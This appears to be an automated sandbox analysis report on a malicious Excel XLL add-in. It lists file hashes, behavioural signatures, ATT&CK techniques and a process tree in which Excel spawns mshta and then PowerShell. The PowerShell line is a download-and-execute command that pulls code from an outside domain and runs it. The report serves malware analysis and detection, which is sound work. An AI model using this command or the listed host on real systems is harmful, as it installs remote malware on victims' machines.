Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240426-en
  • resource tags

    arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    22-05-2024 17:17

General

  • Target

    880ebece77c1e7d66731433d310e7e96cd84430c19d3a7c03f6ef39d5183780f.xll

  • Size

    12KB

  • MD5

    50d2a1a05d05b15baf3c4864b5dc329b

  • SHA1

    d681d7e84d9777fc66072a641eae4a4cfb53b7c3

  • SHA256

    880ebece77c1e7d66731433d310e7e96cd84430c19d3a7c03f6ef39d5183780f

  • SHA512

    c0487f6d0754739c07c8fd0c3f137612615a39e131e9eb954e76ae46bf27137f38198585c1ed84d33a16724bd22d05f982e546a47ff727ab4463dcca9f98c706

  • SSDEEP

    192:GL29RBzDzeobchBj8JON2ON1rQrulrEPEjr7AhV:o29jnbcvYJO/HrIulvr7CV

Score
10/10

Malware Config

Extracted

Language
xlm4.0
Source

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\880ebece77c1e7d66731433d310e7e96cd84430c19d3a7c03f6ef39d5183780f.xll"
    1⤵
    • Loads dropped DLL
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2540
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1408
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3456

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\UZDCDJW4\d[1].htm
    Filesize

    2KB

    MD5

    f754844cfb65838d1dd6b19dde5d835c

    SHA1

    b3eb677783adc88c8d048898449e04d49f416db6

    SHA256

    3644b387519f3509a1ce3d2201e2e1e8af36217138cc6f9e62d6e37c887097a6

    SHA512

    f42f89562b5c0be86dbd04683ee6c30711155acd1239e273da726c2bfedf5d0806c479b7107792c136bff6e97efb8d9145df0c176f499f86f1b7e304a2e3ccdf

  • C:\Users\Admin\AppData\Local\Temp\880ebece77c1e7d66731433d310e7e96cd84430c19d3a7c03f6ef39d5183780f.xll
    Filesize

    12KB

    MD5

    50d2a1a05d05b15baf3c4864b5dc329b

    SHA1

    d681d7e84d9777fc66072a641eae4a4cfb53b7c3

    SHA256

    880ebece77c1e7d66731433d310e7e96cd84430c19d3a7c03f6ef39d5183780f

    SHA512

    c0487f6d0754739c07c8fd0c3f137612615a39e131e9eb954e76ae46bf27137f38198585c1ed84d33a16724bd22d05f982e546a47ff727ab4463dcca9f98c706

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qqib1efb.os4.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/2540-11-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp
    Filesize

    2.0MB

  • memory/2540-82-0x00007FF81AF70000-0x00007FF81AF80000-memory.dmp
    Filesize

    64KB

  • memory/2540-4-0x00007FF81AF70000-0x00007FF81AF80000-memory.dmp
    Filesize

    64KB

  • memory/2540-5-0x00007FF81AF70000-0x00007FF81AF80000-memory.dmp
    Filesize

    64KB

  • memory/2540-9-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp
    Filesize

    2.0MB

  • memory/2540-0-0x00007FF81AF70000-0x00007FF81AF80000-memory.dmp
    Filesize

    64KB

  • memory/2540-2-0x00007FF81AF70000-0x00007FF81AF80000-memory.dmp
    Filesize

    64KB

  • memory/2540-13-0x00007FF818B10000-0x00007FF818B20000-memory.dmp
    Filesize

    64KB

  • memory/2540-14-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp
    Filesize

    2.0MB

  • memory/2540-12-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp
    Filesize

    2.0MB

  • memory/2540-8-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp
    Filesize

    2.0MB

  • memory/2540-7-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp
    Filesize

    2.0MB

  • memory/2540-15-0x00007FF818B10000-0x00007FF818B20000-memory.dmp
    Filesize

    64KB

  • memory/2540-3-0x00007FF85AF83000-0x00007FF85AF84000-memory.dmp
    Filesize

    4KB

  • memory/2540-83-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp
    Filesize

    2.0MB

  • memory/2540-6-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp
    Filesize

    2.0MB

  • memory/2540-10-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp
    Filesize

    2.0MB

  • memory/2540-80-0x00007FF81AF70000-0x00007FF81AF80000-memory.dmp
    Filesize

    64KB

  • memory/2540-81-0x00007FF81AF70000-0x00007FF81AF80000-memory.dmp
    Filesize

    64KB

  • memory/2540-79-0x00007FF81AF70000-0x00007FF81AF80000-memory.dmp
    Filesize

    64KB

  • memory/2540-1-0x00007FF81AF70000-0x00007FF81AF80000-memory.dmp
    Filesize

    64KB

  • memory/2540-63-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp
    Filesize

    2.0MB

  • memory/3456-53-0x0000000005AD0000-0x0000000005AEE000-memory.dmp
    Filesize

    120KB

  • memory/3456-54-0x0000000005B20000-0x0000000005B6C000-memory.dmp
    Filesize

    304KB

  • memory/3456-55-0x0000000007130000-0x00000000077AA000-memory.dmp
    Filesize

    6.5MB

  • memory/3456-56-0x0000000005FE0000-0x0000000005FFA000-memory.dmp
    Filesize

    104KB

  • memory/3456-52-0x0000000005680000-0x00000000059D7000-memory.dmp
    Filesize

    3.3MB

  • memory/3456-43-0x00000000054D0000-0x0000000005536000-memory.dmp
    Filesize

    408KB

  • memory/3456-42-0x00000000053B0000-0x0000000005416000-memory.dmp
    Filesize

    408KB

  • memory/3456-39-0x0000000002640000-0x0000000002676000-memory.dmp
    Filesize

    216KB

  • memory/3456-41-0x0000000004C50000-0x0000000004C72000-memory.dmp
    Filesize

    136KB

  • memory/3456-40-0x0000000004D10000-0x000000000533A000-memory.dmp
    Filesize

    6.2MB